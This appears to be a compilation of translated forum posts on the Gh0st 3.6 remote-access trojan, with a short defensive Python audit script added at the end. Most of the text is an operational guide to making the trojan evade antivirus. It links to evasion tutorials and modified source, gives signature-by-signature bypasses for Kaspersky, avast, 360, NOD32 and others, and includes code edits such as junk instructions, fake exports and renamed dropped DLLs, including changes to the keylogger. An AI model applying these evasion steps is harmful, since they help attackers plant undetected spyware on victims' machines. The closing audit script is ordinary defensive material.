There are four tutorials available here.

Gh0st3.6 compilation tutorial
Http://www.3800hk.com/donghua/f/24166.html

Vc1_1_6.0 AV-evasion tutorial for the gh0st driver .rar
Http://www.heibai.net/download/Soft/Soft_13829.htm

Gh0st source code modified hard disk lock .rar
Http://down.hacker.com.cn/soft/20080607/080607gh0st.rar

--------------------------------------

The following is a bit of information I have found in some forums. It seems to be a bit disorganized...

--------------------------------------

Gh0st discussion thread

The Gh0st 3.6 source code is available, so AV evasion can be done on the basis of the source code. I personally feel that Kaspersky is the best solution. I will put down a first brick to get things started. If you are interested, you can continue the thread or discuss among yourselves.

Make sure to configure the compilation environment: DDK + SDK + VC6. The DDK is used to compile the SYS file, and SDK + VC6 is used to compile the project. For details about why and how to configure it, look up the relevant information on the Internet or read the DDK and SDK help.

After the first compilation, Kaspersky evasion is done first. Kaspersky flags the SYS file and the DLL; of course, Kaspersky also flags install.exe, and finally Kaspersky flags the generated server. Note that what is flagged in the generated server is not a location that overlaps with the previous signatures, but the configuration information.

SYS AV evasion

After the SYS file was recompiled, import table functions were added (for unknown reasons; if you are interested, you can compare it with 1), and it passed the Kaspersky, Kingsoft, and Avira AV environments.

SVCHOST.dll AV evasion

1. The call to the MultiByteToWideChar function. Kaspersky is weak against junk instructions; you can add a few no-op statements before this function.
2. The string "gh0st Update", which is used for updating.
If online update is not required, delete the code block where the statement is located; in fact, you can search the project and replace this string with another string ^_^. This method also gets past Kingsoft. After all, we have the source code.

Server AV evasion

Kaspersky's signature is located in the final configuration information. Jumping over the configuration information is obviously not feasible, so the junk-padding method is used: before writing the aaaaaa configuration information, simply write something else, and the server passes.

Modify the generated DLL

Find the %s\\%sex string in the source program. This location is where 6to4 is generated. You can change it to anything you want to generate.

That is all I wanted to say. You can post here and we can discuss it together.

Has anyone changed the export table (ServiceMain) of SVCHOST.dll that is flagged by MACOs?

To help passers-by improve together, I attached the 3.6 source code. Many copies are on the Internet, so there is no need to search for them. ^_^

In fact, first modify the SYS file. I have a tutorial on Anti-DDoS. After following the tutorial, it passed all the AV software. What I mean is to change the base address of the SYS, DLL and EXE files, after which it passed n AV products.

After completing these steps, Rising still flags the DLL file; optimize the DLL file and add several exports. Kingsoft flags the EXE file; change the entry point. McAfee also flags ServiceMain in the DLL file; move ServiceMain far away. Avira and NOD still flag the import table. These two will not be changed.

The ServiceMain function cannot be commented out. Even if your trojan still runs normally before the system is restarted after it is commented out, once the service runs in the background, your machine will be vulnerable to the next restart. ServiceMain is a key function of SVCHOST.dll. This function has no effect on our gh0st, but it provides support for other services in the system.
Avira flags the EXE at the Subsystem value; is there any way around it? After testing, the location is correct: with all other values outside the Subsystem filled with 0, Avira still flags it, and moving the PE header does not remove the detection!

A small method for adding junk code: the junk code should shift the location of the signature; do not just push things onto the stack, such code is useless. You can add a for loop that counts, simple statistics, and local variables without changing the subsequent logic.

How to add an export: if the export table is flagged, you can add an empty function to the generated SVCHOST.dll. However, you would need to modify the resource after every compilation. Instead, we add the following statements to the source code:

    extern "C" __declspec(dllexport) bool justtempfun(); // declaration
    ......
    extern "C" __declspec(dllexport) bool justtempfun() // implementation
    {
        return false;
    }

After compilation the export table is changed, and that is enough to get past some products.

Gh0st Honglang (Red Wolf) remote control, customized for 360

The main question is why the 6xxx DLL file appears; Red Wolf's Cooldiyer has already explained it. Server generation is random... but it seems that it is not completely random. It is based on the system and garbage. I am not sure about it.

Well, OD is loaded. I will look up a string for you to see. Here: [%s\%sex.dll]. %s is the so-called random part. I can tell you exactly: in 6xxxex.dll, the 6xx actually comes from %s. You only need to modify %s to modify the generated DLL. Hey, I changed it to aaex.dll...
(But pay attention to the "ex.dll" part: do not modify "ex.dll", because modifying it causes the server to go offline. If you want to change it, the "ex.dll" used where the service is launched must also be modified. This is not demonstrated here.)
360 found it. See: compare with 6to4ex.dll. In %sex.dll, the %s has been changed to 6to4.

The source code change method for gh0st customized for 360: in the install.cpp file, change

    wsprintf(strmodulepath, "%s\\%sex.dll", strsysdir, lpservicename);

to

    wsprintf(strmodulepath, "%s\\%whm.CLC", strsysdir, lpservicename);

That's all.

This is actually a mistake by the author. The intention was to select the service to install at random. However, this function is not really random, so every time the service starts from 6to4. A simple solution is to add one line of code:

    .....
    for (ptr = strsubkey; *ptr; ptr = strchr(ptr, 0) + 1)
    {
        if (lstrcmp(ptr, "6to4") == 0) continue; // Add this line of code
        // MessageBox(0, ptr, "check what this is during debugging", 0);
        char temp[500];
        .....

In this way, that service is skipped. In addition, the following line of code builds the string and can be changed at will:

    wsprintf(strmodulepath, "%s\\%sex.dll", strsysdir, ptr);

For example:

    wsprintf(strmodulepath, "%s\\%skill360.dll", strsysdir, ptr);

Or, since it doesn't matter what the suffix is:

    wsprintf(strmodulepath, "%s\\%skill360.abc", strsysdir, ptr);

In %s\\%sex.dll, the first %s indicates the path, and the second %s indicates the random file name. You just need to change the second %s to other letters; after the modification, it gets past scanning and removal by 360 and Kingsoft Cleanup.

Tested: the SYS file of gh0st is interchangeable across versions 2.5 to 3.5.

Service name: 360tray.exe. For the description at the end, enter: 360 real-time security guard protection module. 360 uses behavior-based detection and removal.

How to add junk instructions in the gh0st source code?

    __asm
    {
        your junk instruction
        your junk instruction
        your junk instruction
        your junk instruction
    }

The ServiceMain function is very sensitive. After it is commented out, NOD32, Rising and McAfee are all passed.
Gh0st0 AV evasion: latest modification for avast

It had not been detected for the last two days, but we have just updated avast, and then it was found again. What is flagged is install.exe and SVCHOST.dll (that is, the generated file and the resource file inside it), so next we do source-level evasion for them.

Solution:

1. The SVCHOST.dll signature is located in the saveinfo(char *lpbuffer) function in the keyboardmanager.cpp file, part of the keyboard recorder. The signature string is %02d/%02d/%02d, that is, the date we see in the keyboard record. There are many ways to modify it; change it to [%d/%d:%d], compile, and it passes avast.
2. The install signature is located in "system\\CurrentControlSet\\services\\%s", and the corresponding code is the installservice function in install.cpp. Change the letter case and compile to get past it.

There is no way to upload the attachment. Check the corresponding code. It is also very easy to modify and compile for the two signatures.

NOD32 generally flags the function export table (I don't know if that is what it is called; open the file with UE and a bunch of functions can be seen). Locate the names of the functions that are flagged, generally two or more; load the DLL file that contains the function using LoadLibrary, and then change the name of the function to call it. Once you change the function names, the rest should not be difficult! The final generated file passes NOD without packing.

Kaspersky has a special characteristic: its signatures are mainly code-based. Therefore, we do not have to change the original signature bytes when modifying a signature. We can also modify the code just above the signature; you only need to change it a little, and it has the same effect as adding junk instructions.
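
For defenders, the posts above show that the dropped file name and extension are changed with a one-line edit, so matching on a fixed name such as 6to4ex.dll is brittle. The following added example (not from the original posts or the Gh0st source) audits svchost service DLL paths against a known-good baseline instead; it assumes the install records the DLL path in the service's Parameters\ServiceDll registry value, and the baseline, sample records and reason labels are constructed for illustration.

```python
import ntpath

SYSTEM_ROOT = r"C:\WINDOWS"  # assumption for this constructed sample

# Constructed baseline: service name -> ServiceDll taken from a trusted image.
BASELINE = {
    "6to4": r"%SystemRoot%\System32\6to4svc.dll",
    "othersvc": r"%SystemRoot%\System32\othersvc.dll",
    "demosvc": r"%SystemRoot%\System32\demosvc.dll",
}

# Constructed records, as exported from Services\<name>\Parameters\ServiceDll.
SAMPLE = [
    ("6to4", r"C:\WINDOWS\system32\6to4ex.dll"),             # default pattern
    ("demosvc", r"C:\WINDOWS\system32\demosvckill360.abc"),  # renamed variant
    ("OtherSvc", r"C:\Windows\System32\othersvc.dll"),       # matches baseline
    ("newsvc", r"C:\WINDOWS\system32\helper.dll"),           # no baseline entry
]

def norm(path):
    """Expand %SystemRoot% and normalise case and separators."""
    low = path.lower().replace("%systemroot%", SYSTEM_ROOT.lower())
    return ntpath.normpath(low)

def audit(services, baseline):
    """Return {service: [reasons]} for every ServiceDll that deviates."""
    findings = {}
    for name, service_dll in services:
        key = name.lower()
        path = norm(service_dll)
        expected = baseline.get(key)
        if expected is not None and path == norm(expected):
            continue  # identical to the trusted value, nothing to report
        reasons = ["not_in_baseline"]
        stem, ext = ntpath.splitext(ntpath.basename(path))
        # <service name> + arbitrary suffix: the "%s\\%sex.dll" family,
        # whatever the suffix was changed to.
        if stem.startswith(key) and stem != key:
            reasons.append("service_name_prefix")
        # A service DLL that is not a .dll is rare on a clean system.
        if ext != ".dll":
            reasons.append("non_dll_extension")
        findings[name] = reasons
    return findings

if __name__ == "__main__":
    for svc, why in audit(SAMPLE, BASELINE).items():
        print(svc, why)
```

The baseline comparison is what carries the detection; the prefix and extension reasons only help prioritise, since both are under the author's control.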